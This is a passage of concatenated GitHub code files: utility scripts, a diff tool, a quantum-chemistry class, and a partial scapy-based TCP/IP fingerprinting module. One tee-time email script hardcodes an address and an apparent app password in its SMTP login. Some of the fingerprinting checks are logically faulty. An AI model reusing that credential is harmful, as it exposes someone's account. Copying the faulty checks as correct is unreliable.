print(decrypted_element[1:])\n decrypted_message.append(decrypted_element[1:])\n \n\n decrypted_message = decrypt_sudoku(solved_sudoku, decrypted_message)\n \n print(f'Server: Message => {decrypted_message}')\n\n acknoledgement = 'Message successfully received by Server.'\n print(f'Sending: {acknoledgement}')\n conn.send(acknoledgement.encode())\n\n conn.close()\n\n\nif __name__ == '__main__':\n start_server()\n","repo_name":"adityaa30/sudoku-rsa-encrypt","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15561075229","text":"import csv\n\n# init var setup\n_itemName = []\n_level = []\n_rawMaterial = []\n_quantity = []\n_unit = []\n\n# read data from CSV File and store them in their respective list\nwith open('bom.csv', mode='r') as csv_file:\n csv_reader = csv.DictReader(csv_file)\n line_count = 0\n for row in csv_reader:\n if line_count >= 0:\n _itemName.append(row[\"Item Name\"])\n _level.append(int(row['Level'].replace('.', ''))) # replace dot and type cast level value to integer\n _rawMaterial.append(row['Raw material'])\n _quantity.append(row['Quantity'])\n _unit.append(row['Unit '])\n line_count += 1\n\n# get top level item \n_uniqueItems = set(_itemName)\n\n# get all unique level\n_uniqueLevels = []\nfor lvl in _level:\n if lvl not in _uniqueLevels:\n _uniqueLevels.append(lvl)\n\n# sort to make it easy for later maths\n_uniqueLevels.sort()\n\n# loop through the top level item items and \n# make their respective BOM files\ncounter = 0\nfor item in _uniqueItems:\n filename = item\n with open(f'{filename}.csv', mode='w') as f:\n info_writer = csv.writer(f, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n info_writer.writerow(['Finished Good List'])\n fieldnames = ['#', 'Item Description', 'Quantity', 'Unit']\n writer = csv.DictWriter(f, fieldnames=fieldnames)\n writer.writeheader()\n writer.writerow({'#': 1, 'Item Description': filename, 'Quantity': 1, 'Unit': 'Pc'})\n\n info_writer.writerow(['End Of FG'])\n info_writer.writerow(['Raw Material List'])\n writer.writeheader()\n\n row = 0\n serial = 1\n for uniLevel in _uniqueLevels:\n for level in _level:\n if uniLevel > 1:\n if _itemName[row] == item and _level[row] == uniLevel:\n _list = []\n for i in reversed(range(row)):\n _list.append(i + 1)\n if _level[i] == uniLevel - 1:\n rm_filename = _rawMaterial[i]\n with open(f'{rm_filename}.csv', mode='w') as rmf:\n rm_info_writer = csv.writer(rmf, delimiter=',', quotechar='\"',\n quoting=csv.QUOTE_MINIMAL)\n rm_info_writer.writerow(['Finished Good List'])\n rm_fieldnames = ['#', 'Item Description', 'Quantity', 'Unit']\n rm_writer = csv.DictWriter(rmf, fieldnames=rm_fieldnames)\n rm_writer.writeheader()\n rm_writer.writerow(\n {'#': 1, 'Item Description': rm_filename, 'Quantity': _quantity[i],\n 'Unit': _unit[i]})\n\n rm_info_writer.writerow(['End Of FG'])\n rm_info_writer.writerow(['Raw Material List'])\n rm_writer.writeheader()\n\n rm_serial = 1\n for product_serial in _list:\n rm_writer.writerow({'#': rm_serial,\n 'Item Description': _rawMaterial[product_serial],\n 'Quantity': _quantity[product_serial],\n 'Unit': _unit[product_serial]\n })\n rm_serial += 1\n break\n else:\n if _itemName[row] == item and _level[row] == 1:\n writer.writerow({'#': serial, 'Item Description': _rawMaterial[row], 'Quantity': _quantity[row],\n 'Unit': _unit[row]})\n serial += 1\n row += 1\n row = 0\n info_writer.writerow(['End Of RM'])\n counter += 1\n","repo_name":"rishukr06/bill-of-materials","sub_path":"bom.py","file_name":"bom.py","file_ext":"py","file_size_in_byte":4187,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"42286289782","text":"import cv2\nimport os\nfrom datetime import datetime\nimport psutil\n\nclass Recorder:\n def __init__(self, width: int, height: int, path: str, fps: float, format: str, device: int):\n self.width = width\n self.height = height\n self.path = path\n self.fps = fps\n self.format = format\n self.device = device\n\n def check_dir(self):\n print(\"Check directory:\")\n if os.path.isdir(self.path):\n print(\"\\tThis directory exist\\n\")\n else:\n os.mkdir(self.path)\n print(\"\\tDirectory successfully created\\n\")\n\n def source_format(self):\n if self.format == \"MJPG\":\n fourcc = cv2.VideoWriter_fourcc(*'MJPG')\n return fourcc\n else:\n print(f\"Error: Format '{self.format}' is not supported\")\n\n def check_space(self):\n disk = psutil.disk_usage('/')\n free_space = disk.free/(1024**3)\n print(\"\\nCheck free space on disk:\")\n if free_space > 50:\n print(f\"\\tFree space on disk: {free_space:.2f} GB\")\n return True\n else:\n print(\"⚠ ERROR: Not enough space ⚠\")\n print(f\"\\tOnly free space on disk: {free_space:.2f} GB\")\n print(f\"\\t⚠ Please make some space on your disk. You should get more than 50 Go of free space ⚠\")\n return False\n\n\n def periph_choice(self):\n # checks the first 10 indexes.\n index = 0\n arr = []\n i = 10\n while i > 0:\n cap = cv2.VideoCapture(index)\n if cap.read()[0]:\n arr.append(index)\n cap.release()\n index += 1\n i -= 1\n return arr# TODO write method to find the go video peripheric to record video\n\n def record(self):\n cap = cv2.VideoCapture(self.device)\n cap.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter_fourcc(*'MJPG'))\n cap.set(cv2.CAP_PROP_FRAME_WIDTH, self.width)\n cap.set(cv2.CAP_PROP_FRAME_HEIGHT, self.height)\n cap.set(cv2.CAP_PROP_FPS, self.fps)\n\n format = cap.get(cv2.CAP_PROP_FORMAT)\n width = cap.get(cv2.CAP_PROP_FRAME_WIDTH)\n height = cap.get(cv2.CAP_PROP_FRAME_HEIGHT)\n fps = cap.get(cv2.CAP_PROP_FPS)\n\n # Date text setup\n font = cv2.FONT_HERSHEY_SIMPLEX\n scale = 1\n color = (0, 168, 0)\n\n print(\"Video property:\")\n print(f\"\\tWidth: {width}\")\n print(f\"\\tHeight: {height}\")\n print(f\"\\tFPS: {fps}\")\n print(f\"\\tFormat: {format}\")\n\n current_time = datetime.now().strftime('%Y-%m-%d_%H-%M-%S')\n video_time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n\n fourcc = Recorder.source_format(self)#cv2.VideoWriter_fourcc(*'mp4v')#\n out = cv2.VideoWriter(f\"{self.path}/video_{current_time}.avi\", fourcc, fps, (int(width), int(height)))\n\n while (cap.isOpened()):\n # Capture frame-by-frame\n ret, frame = cap.read()\n if ret == True:\n # Set date and hours\n current_time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n cv2.putText(frame, current_time, (0, 25), font, scale, color, 2)\n\n # Write the frame into the output video file\n out.write(frame)\n\n # Display the resulting frame\n cv2.imshow(f\"Cam Recording start: {video_time}\", frame)\n\n # Press 'q' to exit the loop\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n else:\n break\n\n # Release everything when the job is finished\n cap.release()\n out.release()\n cv2.destroyAllWindows()","repo_name":"romain420/camera_recorder","sub_path":"record.py","file_name":"record.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38062734170","text":"#!/usr/bin/env python3\r\nimport argparse\r\nimport numpy as np\r\nimport sys\r\nsys.path.append('../')\r\n\r\n\r\n\"\"\"\r\nThe script is mimicking the linux diff. It uses a algorithm\r\nfor finding the Longest Common Subsequence. Based on info\r\nabout the Longest Common Subsequence the script prints what\r\nis different between two input files. What is removed, added or\r\nchanged.\r\n\"\"\"\r\n\r\n\r\ndef __writeDiffToFile(diffOut):\r\n \"\"\"Function for writing the diff result to a text file.\r\n and prints out the diff result.\r\n Args:\r\n - diffOut (list): A list of all lines from the result\r\n of the diff algorithm.\r\n \"\"\"\r\n with open(\"diff_output.txt\", \"w+\") as out_file:\r\n for i in range(len(diffOut)):\r\n diff = diffOut.pop()\r\n out_file.write(diff)\r\n print(diff.rstrip())\r\n\r\n\r\ndef __writeSyntaxAndThemeToFile():\r\n \"\"\"Function for writing/making a diff syntax file,\r\n and a diff theme file.\r\n \"\"\"\r\n addedRegex = \"\\\"^(\\+.+)|(\\+)$\\\"\" + \": added\"\r\n removedRegex = \"\\\"^(\\-.+)|(\\-)$\\\"\" + \": removed\"\r\n\r\n with open(\"diff.syntax\", \"w+\") as out_file:\r\n out_file.write(addedRegex + \"\\n\")\r\n out_file.write(removedRegex + \"\\n\")\r\n\r\n with open(\"diff.theme\", \"w+\") as out_file:\r\n out_file.write(\"added: 0;\" + str(92) + \"\\n\")\r\n out_file.write(\"removed: 0;\" + str(31) + \"\\n\")\r\n\r\n print(\"\\n diff syntaxt and theme are written to files\")\r\n\r\n\r\ndef __readTextFromFile(filename):\r\n \"\"\"Function for reading a text file containing text to highlight\r\n Args:\r\n - filename (str): File location as string for the text file.\r\n Returns:\r\n lines (list): A list of strings for all lines read in file\r\n \"\"\"\r\n with open(filename, \"r\") as file:\r\n lines = file.readlines()\r\n return lines\r\n\r\n\r\ndef __lcsMatrix(original, changed):\r\n \"\"\"Builds the longest common subsequence (lcs) matrix from\r\n the input original file and the changed file.\r\n Args:\r\n - original (list): A list of all lines from the original file\r\n - changed (list): A list of all lines from the changed file\r\n Returns:\r\n matrix (numpy array): longest common subsequence matrix/array\r\n \"\"\"\r\n matrix = np.zeros((1+len(changed), 1+len(original)))\r\n for y in range(matrix.shape[0]-1): # lines in original\r\n ym = y + 1\r\n for x in range(matrix.shape[1]-1): # lines in changed\r\n xm = x + 1\r\n if (changed[y] == original[x]):\r\n diagonalValue = matrix[y][x]\r\n matrix[ym][xm] = diagonalValue + 1\r\n else:\r\n max_s_c = max(matrix[ym][xm - 1], matrix[ym - 1][xm])\r\n matrix[ym][xm] = max_s_c\r\n return matrix\r\n\r\n\r\ndef __lcsWithBacktracking(matrix, original, changed):\r\n \"\"\"Backtracking along the lcs matrix to find the longest common\r\n subsequence of lines and stores it. Using info from the matrix to\r\n collect the correct lines (removed, added, or changed) from the two input\r\n files.\r\n\r\n Args:\r\n - matrix (numpy array): Longest common subsequence matrix/array\r\n - original (list): A list of all lines from the original file\r\n - changed (list): A list of all lines from the changed file\r\n Returns:\r\n lcs, lcsLength, diffResult (tuple):\r\n\r\n - lcs (str): A string representation of the longest common\r\n subsequence.\r\n\r\n - lcsLength (int): The length of the longest common subsequence\r\n\r\n - diffResult (list): The entire diff result line-by-line stored\r\n as strings in a list in the correct order.\r\n Index corresponds to line nb.\r\n \"\"\"\r\n yp = matrix.shape[0] - 1\r\n xp = matrix.shape[1] - 1\r\n lcsLength = 0\r\n lcs = \"\"\r\n stack = []\r\n\r\n diffResult = []\r\n while True:\r\n left = matrix[yp][xp - 1]\r\n up = matrix[yp - 1][xp]\r\n if((yp < 1) or (xp < 1)):\r\n break\r\n if (left == up):\r\n if(matrix[yp][xp] == up):\r\n yp -= 1 # move up the matrix\r\n added = f\"+ {changed[yp]}\"\r\n if (changed[yp] == \"\\n\"):\r\n added = f\"+ \\n\"\r\n addedInChange = added\r\n diffResult.append(addedInChange)\r\n else:\r\n common = original[xp-1]\r\n diffResult.append(f\"0 {common}\")\r\n stack.append(f\"0 {common}\")\r\n lcsLength += 1\r\n yp -= 1 # move diagonaly up the matrix\r\n xp -= 1 # move diagonaly up the matrix\r\n elif (left > up): # move left the matrix\r\n xp -= 1\r\n removedFromoriginal = f\"- {original[xp]}\"\r\n diffResult.append(removedFromoriginal)\r\n elif (left < up): # move up the matrix\r\n yp -= 1\r\n added = f\"+ {changed[yp]}\"\r\n if(changed[yp] == \"\\n\"):\r\n added = f\"+ \\n\"\r\n addedInChange = added\r\n diffResult.append(addedInChange)\r\n\r\n # Fixes the last corner case. End in x or y in matrix\r\n if(xp > 0):\r\n for i in range(xp):\r\n xp -= 1\r\n removedFromoriginal = f\"- {original[xp]}\"\r\n diffResult.append(removedFromoriginal)\r\n elif(yp > 0):\r\n for j in range(yp):\r\n yp -= 1\r\n added = f\"+ {changed[yp]}\"\r\n if (changed[yp] == \"\\n\"):\r\n added = f\"+ \\n\"\r\n diffResult.append(added)\r\n\r\n for j in range(len(stack)):\r\n lcs += stack.pop()\r\n return lcs, lcsLength, diffResult\r\n\r\n\r\ndef superdiff(originalFile, changedFile):\r\n \"\"\"The function reads inn text from two files, and\r\n finds out what is differant/changed in the changed file.\r\n Finally it writes the differance to a output file.\r\n Args:\r\n - originalFile (str): File location as string for the\r\n original original file\r\n - changedFile (str): File location as string for the\r\n changed file\r\n \"\"\"\r\n original = __readTextFromFile(originalFile)\r\n changed = __readTextFromFile(changedFile)\r\n matrix = __lcsMatrix(original, changed)\r\n lcs, lcsLength, diff = __lcsWithBacktracking(matrix, original, changed)\r\n __writeDiffToFile(diff)\r\n __writeSyntaxAndThemeToFile()\r\n\r\n\r\ndef main():\r\n \"\"\"The main function uses argparser to get arguments.\r\n Feeds the superdiff function\r\n with arguments. Arguments are described in help.\r\n \"\"\"\r\n argparser = argparse.ArgumentParser()\r\n argparser.add_argument('originalFile', type=str,\r\n help='File to check for changes against')\r\n argparser.add_argument('changedFile', type=str,\r\n help='File to check for changes in')\r\n args = argparser.parse_args()\r\n superdiff(args.originalFile, args.changedFile)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"AndreasBordvik/Regular-expression-modules","sub_path":"diff.py","file_name":"diff.py","file_ext":"py","file_size_in_byte":6818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26597814449","text":"print(\"\\n\\n\\n\");\n\nprint(\"Please choose the log-level (1-4)\\n\\n\"\n \"1. EVENT\\n\"\n \"2. WARN\\n\"\n \"3. INFO\\n\"\n \"4. DEBUG\\n\");\n\ntry:\n level = int(input())\n\n if( (level >= 1) and (level <= 4) ):\n with open(\"log_level\", \"w\") as fp:\n fp.write(str(level))\n\n print(\"Log-Level changed successfully.\\n\\n\")\n\nexcept:\n print(\"Invalid value entered, exiting .. \\n\\n\")\n","repo_name":"ajaygarg84/trafficshaper","sub_path":"tools/linux_desktop_i386/change_log_level.py","file_name":"change_log_level.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32509436298","text":"import requests\nfrom bs4 import BeautifulSoup\nimport smtplib\nimport time as t\nfrom password import password\n\n# Keep track of how many times program runs\ncounter = 0\n\nsender = 'conordurkin@me.com'\nreceiver = 'conordurkin@me.com'\n\nmessage_opening = \"\"\"From: \nTo: \nSubject: Muirfield has an opening!\n\nHi there - Muirfield has an opening for you!\nGo check it rather quickly before someone else snatches it up:\n\nhttps://www.muirfield.org.uk/visitors/?date=05/13/2021#booking\n\nGood luck.\n\n\"\"\"\n\nmessage_running = \"\"\"From: \nTo: \nSubject: Muirfield app is still running.\n\nNothing yet on Muirfield. Will keep checking.\n\n \"\"\"\n\nwhile True:\n\n # This is the code to check the website - if len(free) > 0, then a tee time is available.\n page = requests.get(\"https://www.muirfield.org.uk/visitors/?date=05/13/2021#booking\")\n soup = BeautifulSoup(page.content, features = 'html.parser')\n free = soup.find_all('td', string = \"Yes\")\n booked = soup.find_all('td', string = \"No\")\n len(free)\n len(booked)\n counter += 1\n\n if len(free) > 0:\n # If time opens up, send me the \"Opening exists\" email, then stop checking the site.\n smtpObj = smtplib.SMTP('smtp.mail.me.com', 587)\n smtpObj.ehlo()\n smtpObj.starttls()\n smtpObj.login('conordurkin@me.com', password)\n smtpObj.sendmail(sender, receiver, message_opening)\n smtpObj.quit()\n break\n\n elif counter % 2 == 0:\n # Using a much smaller interval here to test that it runs right.\n smtpObj = smtplib.SMTP('smtp.mail.me.com', 587)\n smtpObj.ehlo()\n smtpObj.starttls()\n smtpObj.login('conordurkin@me.com', 'lhad-xtzr-rdtu-pqrt')\n smtpObj.sendmail(sender, receiver, message_running)\n smtpObj.quit()\n t.sleep(300)\n\n else:\n # If no times, wait 5 minutes, then check again.\n t.sleep(300)\n","repo_name":"conordurkin/teetime","sub_path":"forlooptesting.py","file_name":"forlooptesting.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1755309210","text":"from moha.system.wavefunction.base import BaseWaveFunction\nfrom moha.posthf.ci.ci_basis_set import CIBasisSet\n\nimport numpy as np \n\nclass CIWaveFunction(BaseWaveFunction):\n \"\"\"Configuration interaction wavefunction class.\n\n Attributes\n ----------\n nelec : int\n Number of electrons.\n\n occ : dict\n Occupation number of the wavefunction.\n \n nspatial : int\n Number of spatial orbitals.\n \n basis_set : Basis\n Basis set of the wavefunction.\n \n coefficients : np.ndarray\n Coefficientss of the wavefunction.\n\n Properties\n ----------\n ncoefficients : int\n Number of coefficients.\n \n nspin : int\n Number of spin orbital\n \n spin : int\n Spin of the wavefunction\n \n seniority: int\n Seniority of the wavefunction\n\n Methods\n -------\n __init__(self, nelec, nspatial, basis_set=None, coefficients=None)\n Initialize the wavefunction.\n \n assign_nelec(self, nelec)\n Assign the number of electrons.\n \n assign_nspatial(self, nspatial)\n Assign the number of spatial orbitals.\n\n assign_occ(self, occ)\n Assign the occupation number of the wavefunction. \n \n assign_basis_set(self, basis_set)\n Assign basis set of the wavefunction.\n \n assign_coefficients(self, coefficients)\n Assign coefficients of the wavefunction.\n \"\"\"\n\n def __init__(self,nelec,nspatial,occ={},basis_set=None,coefficients=None):\n \"\"\"Initialize the wavefunction.\n\n Parameters\n ----------\n nelec : int\n Number of electrons.\n \n nspin : int\n Number of spin orbitals.\n \n occ : dict\n Occupation number of the wavefunction.\n\n dtype : {float, complex, np.float64, np.complex128, None}\n Numpy data type.\n Default is `np.float64`.\n \n memory : {float, int, str, None}\n Memory available for the wavefunction.\n Default does not limit memory usage (i.e. infinite).\n\n \"\"\"\n super().__init__(nelec,nspatial,occ,basis_set,coefficients)\n\n @property\n def configuration(self):\n \"\"\"Return the cofiguration of the wavefunction.\n\n Returns\n -------\n c : dict\n Configuration of the wavefunction.\n \"\"\"\n c = {}\n for spin in self.occ:\n c[spin] = [1]*self.occ[spin] + [0]*(self.nspatial - self.occ[spin])\n return c\n \n @property\n def ncoefficients(self):\n \"\"\"Return the number of wavefunction coefficients.\n\n Returns\n -------\n ncoefficients : int\n Number of coefficients.\n \n Raises\n ------\n TypeError\n If coefficients is not a np.ndarray instance.\n \"\"\"\n if not isinstance(self.coefficients,np.ndarray):\n raise TypeError(\"Coefficients is not a np.ndarray instance.\")\n return self.coefficients.size\n \n @property\n def seniority(self):\n \"\"\"Return the seniority of the wavefunction.\n\n Seniority of a Slater determinant is its number of unpaired electrons. The seniority of the\n wavefunction is the expected number of unpaired electrons.\n\n Returns\n -------\n seniority : int\n Seniority of the wavefunction.\n\n Notes\n -----\n `None` means that all possible seniority are allowed.\n\n \"\"\"\n return None\n \n def assign_basis_set(self, basis_set):\n \"\"\"Assign the basis_set of the wavefunction.\n\n Parameters\n ----------\n basis_set \n Basis set of the wavefunction.\n\n Raises\n ------\n TypeError\n If basis set is not a CIBasisSet instance. \n \"\"\"\n if not isinstance(basis_set,CIBasisSet):\n raise TypeError(\"Basis set must be CIBasisSet instance.\")\n self.basis_set = basis_set\n\n def assign_coefficients(self, coefficients):\n \"\"\"Assign the coefficients of the wavefunction.\n\n Parameters\n ----------\n coefficients\n Parameters of the wavefunction.\n\n Raises\n ------\n TypeError\n If coefficients is not a np.ndarray. \n \"\"\"\n if coefficients is None:\n coefficients = np.zeros((self.nspatial))\n elif not isinstance(coefficients,np.ndarray):\n raise TypeError(\"Coefficients is not a np.ndarray instance.\")\n self.coefficients = coefficients\n","repo_name":"ZhaoYilin/moha","sub_path":"moha/posthf/ci/ci_wavefunction.py","file_name":"ci_wavefunction.py","file_ext":"py","file_size_in_byte":4542,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"} +{"seq_id":"28107598373","text":"from setuptools import setup\nimport codecs\nimport os\nimport re\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\n# Read the version number from a source file.\n# Why read it, and not import?\n# see https://groups.google.com/d/topic/pypa-dev/0PkjVpcxTzQ/discussion\ndef find_version(*file_paths):\n # Open in Latin-1 so that we avoid encoding errors.\n # Use codecs.open for Python 2 compatibility\n with codecs.open(os.path.join(here, *file_paths), 'r', 'latin1') as f:\n version_file = f.read()\n\n # The version line must have the form\n # __version__ = 'ver'\n version_match = re.search(r\"^__version__ = ['\\\"]([^'\\\"]*)['\\\"]\",\n version_file, re.M)\n if version_match:\n return version_match.group(1)\n raise RuntimeError(\"Unable to find version string.\")\n\nsetup(name='slackclient',\n version=find_version('slackclient', 'version.py'),\n description='Python client for Slack.com',\n url='http://github.com/slackapi/python-slackclient',\n author='Ryan Huber',\n author_email='ryan@slack-corp.com',\n license='MIT',\n packages=['slackclient'],\n install_requires=[\n 'websocket-client',\n 'requests',\n 'six',\n ],\n zip_safe=False)\n","repo_name":"LaurentLouf/python-slackclient","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"23520954694","text":"import argparse\nimport os\nfrom huggingface_hub import hf_hub_download\n\ndef read_token_from_file(token_file_path):\n with open(token_file_path, 'r') as file:\n return file.read().strip()\n\ndef download_file_from_huggingface(repo_id, file_path, token=None, local_dir=None):\n try:\n # Downloading the file using hf_hub_download\n downloaded_data_path = hf_hub_download(\n repo_id=repo_id,\n filename=file_path,\n token=token,\n local_dir=local_dir,\n local_dir_use_symlinks=False\n )\n print(f'File downloaded successfully to: {downloaded_data_path}')\n except Exception as e:\n print(f'An error occurred while downloading the file: {str(e)}')\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Download a file from a HuggingFace repository.')\n parser.add_argument('--repo_id', type=str, required=True, help='Repository ID in HuggingFace.')\n parser.add_argument('--file_path', type=str, required=True, help='Path to the file in the repository.')\n parser.add_argument('--token', type=str, help='Path to the token file for private repositories.')\n parser.add_argument('--local_dir', type=str, default=\".\", help='Path to local directory to save the file.')\n\n args = parser.parse_args()\n\n if args.token:\n token = read_token_from_file(args.token)\n else:\n token = None\n\n download_file_from_huggingface(args.repo_id, args.file_path, token, args.local_dir)\n\n\n# python3 huggingface_download.py --repo_id=\"username/Dreambooth\" --file_path=\"filename.zip\" --token=\"/path/read_token.secret\" --local_dir \"/path_local/\"","repo_name":"curtwagner1984/stable_diffusion_tools","sub_path":"huggingface_download.py","file_name":"huggingface_download.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"2802684920","text":"#Imports\nfrom scapy.all import sniff\nimport sys\n\n\nclass quirk:\n \"\"\"\n Creates quirks - comma-delimited properties and quirks observed in IP or TCP headers.\n If a signature scoped to both IPv4 and IPv6 contains quirks valid\n for just one of these protocols, such quirks will be ignored for\n on packets using the other protocol. For example, any combination\n of 'df', 'id+', and 'id-' is always matched by any IPv6 packet.\n \"\"\"\n\n def __init__(self, p):\n '''Takes a packet as an argument.'''\n self.p = p\n\n def __str__(self):\n return self.qstring\n\n @property\n def df(self):\n '''Sets df attribute based on flag - \"don't fragment\" set (probably PMTUD); ignored for IPv6.'''\n df = False\n version = self.p.version\n if version == 6:\n return False\n else:\n if 'DF' in self.p['IP'].flags.names:\n df = 'df'\n return df\n\n @property\n def id_plus(self):\n '''Sets id+ attribute based on flag and IPID - DF set but IPID non-zero; ignored for IPv6.'''\n version = self.p.version\n if version == 6:\n return False\n else:\n id_plus = False\n if self.p['IP'].flags =='DF' and self.p['IP'].id != 0:\n id_plus = 'id+'\n return id_plus\n\n @property\n def id_minus(self):\n '''Sets id- attribute based on flag and IPID - DF not set but IPID is zero; ignored for IPv6.'''\n version = self.p.version\n if version == 6:\n return False\n else:\n id_minus = False\n if self.p['IP'].flags =='DF' and self.p['IP'].id == 0:\n id_minus = 'id-'\n return id_minus\n\n @property\n def ecn(self):\n '''Sets ecn attribute - explicit congestion notification support.'''\n ecn = False\n if 'E' in self.p['TCP'].flags:\n ecn = 'ecn'\n return ecn\n\n @property\n def zero_plus(self):\n '''Sets 0+ Attribute - \"must be zero\" field not zero; ignored for IPv6.'''\n version = self.p.version\n if version == 6:\n return False\n else:\n zero_plus = False\n if self.p.reserved != 0:\n zero_plus = '0+'\n return zero_plus\n\n @property\n def flow(self):\n '''Sets flow Attribute - non-zero IPv6 flow ID; ignored for IPv4.'''\n #TODO IPv6 support\n return False\n\n @property\n def seq_minus(self):\n '''Sets seq- attribute - sequence number is zero.'''\n seq_minus = False\n if self.p['TCP'].seq == 0:\n seq_minus = 'seq-'\n return seq_minus\n\n @property\n def ack_plus(self):\n '''Sets ack+ - ACK number is non-zero, but ACK flag not set.'''\n ack_plus = False\n if self.p['TCP'].ack != 0:\n ack_plus = 'ack+'\n return ack_plus\n\n @property\n def ack_minus(self):\n '''Sets ack- - ACK number is zero, but ACK flag set.'''\n ack_minus = False\n if self.p['TCP'].ack == 0:\n ack_minus = 'ack-'\n return ack_minus\n\n @property\n def uptr_plus(self):\n '''Sets uptr+ attribute - URG pointer is non-zero, but URG flag not set.'''\n uptr_plus = 'uptr+'\n return uptr_plus\n\n @property\n def urgf_plus(self):\n '''Sets urgf+ attribute - URG flag used.'''\n urgf_plus = False\n if 'URG' in self.p['IP'].flags:\n urgf_plus = 'urgf+'\n return urgf_plus\n\n @property\n def pushf_plus(self):\n '''Sets pushf+ attribute - PUSH flag used.'''\n pushf_plus = False\n if 'PUSH' in self.p['IP'].flags:\n pushf_plus = 'pushf+'\n return pushf_plus\n\n @property\n def ts1_minus(self):\n '''Sets ts1- attribute - own timestamp specified as zero.'''\n ts1_minus = False\n try:\n ts1 = dict(self.p['TCP'].options)\n if ts1['Timestamp'][0] == 0:\n ts1_minus = 'T0'\n except:\n pass\n return ts1_minus\n\n @property\n def ts2_plus(self):\n '''Sets ts2+ attribute - non-zero peer timestamp on initial SYN.'''\n ts2_plus = False\n try:\n ts2 = dict(self.p['TCP'].options)\n if ts2['Timestamp'][1] != 0:\n ts2_plus = 'T'\n except:\n pass\n return ts2_plus\n\n @property\n def opt_plus(self):\n '''Sets opt+ attribute - trailing non-zero data in options segment.'''\n opt_plus = False\n return opt_plus\n\n @property\n def exws(self):\n '''Sets exws attribute - excessive window scaling factor (> 14).'''\n try:\n exws = dict(self.p['TCP'].options)\n except:\n exws = False\n if exws != False:\n try:\n exws = exws['WScale'] >= 14\n return exws\n except:\n pass\n else:\n return False\n\n @property\n def bad(self):\n '''Sets bad attribute - malformed TCP options.'''\n bad = isinstance(self.p['TCP'].options, list)\n return False\n\n @property\n def qstring(self):\n '''Looks at all attributes and makes quirks.'''\n quirks = []\n if self.df: quirks.append(self.df)\n if self.id_plus: quirks.append(self.id_plus)\n if self.id_minus: quirks.append(self.id_minus)\n if self.ecn: quirks.append(self.ecn)\n if self.zero_plus: quirks.append(self.zero_plus)\n if self.flow: quirks.append(self.flow)\n if self.seq_minus: quirks.append(self.seq_minus)\n if self.ack_plus: quirks.append(self.ack_plus)\n if self.ack_minus: quirks.append(self.ack_minus)\n if self.uptr_plus: quirks.append(self.uptr_plus)\n if self.urgf_plus: quirks.append(self.urgf_plus)\n if self.pushf_plus: quirks.append(self.pushf_plus)\n if self.ts1_minus: quirks.append(self.ts1_minus)\n if self.ts2_plus: quirks.append(self.ts2_plus)\n if self.opt_plus: quirks.append(self.opt_plus)\n if self.exws: quirks.append(self.exws)\n if self.bad: quirks.append(self.bad)\n quirks = \",\".join(quirks)\n return quirks\n\n\nclass signature:\n \"\"\"\n Data mapping class that takes a TCP Signature object and inserts it into the sqlite database.\n \"\"\"\n def __init__(self, p):\n self.p = p\n\n def process_options(option):\n if option[0] == 'MSS' and (option[1] == 0 or option[1] == ''):\n return 'M*'\n elif option[0] == 'MSS' and option[1] > 1:\n return 'M' + str(option[1])\n elif option[0] == 'NOP':\n return 'N'\n elif option[0] == 'WScale':\n return 'W' + str(option[1])\n elif option[0] == 'SAckOK':\n return 'S'\n elif option[0] == 'EOL':\n return 'E'\n else:\n #TODO\n # The p0f docs state:\n # ?n - unknown option ID n\n # What does that even mean?\n # Then to make things even more vague\n # some random documentation on cert.org states:\n # ?n - unrecognized option number n.\n # Soooooo, unrecognized != unknown\n # I came up with the following and the output does not look correct. \\\n # We went with literally returning '?n'\n # return '?' + str(option[1])\n return '?n'\n\n @property\n def version(self):\n '''Signature for IPv4 ('4'), IPv6 ('6'), or both ('*').'''\n version = self.p.version\n return str(version)\n\n @property\n def ittl(self):\n '''\n Initial TTL used by the OS. Almost all operating systems use\n 64, 128, or 255; ancient versions of Windows sometimes used\n 32, and several obscure systems sometimes resort to odd values\n such as 60.\n\n NEW SIGNATURES: P0f will usually suggest something, using the\n format of 'observed_ttl+distance' (e.g. 54+10). Consider using\n traceroute to check that the distance is accurate, then sum up\n the values. If initial TTL can't be guessed, p0f will output\n 'nnn+?', and you need to use traceroute to estimate the '?'.\n\n A handful of userspace tools will generate random TTLs. In these\n cases, determine maximum initial TTL and then add a - suffix to\n the value to avoid confusion.\n '''\n if self.version == '4':\n ittl = self.p['IP'].ttl\n elif self.version == '6':\n ittl = self.p['IPv6'].ttl\n else:\n ittl = ''\n return ittl\n\n @property\n def olen(self):\n '''\n Length of IPv4 options or IPv6 extension headers. Usually zero\n for normal IPv4 traffic; always zero for IPv6 due to the\n limitations of libpcap.\n '''\n if self.version == '4':\n olen = len(self.p['IP'].options)\n elif self.version == '6':\n olen = len(self.p['IPv6'].options)\n else:\n olen = ''\n return str(olen)\n\n @property\n def mss(self):\n '''\n maximum segment size, if specified in TCP options. Special value\n of '*' can be used to denote that MSS varies depending on the\n parameters of sender's network link, and should not be a part of\n the signature. In this case, MSS will be used to guess the\n type of network hookup according to the [mtu] 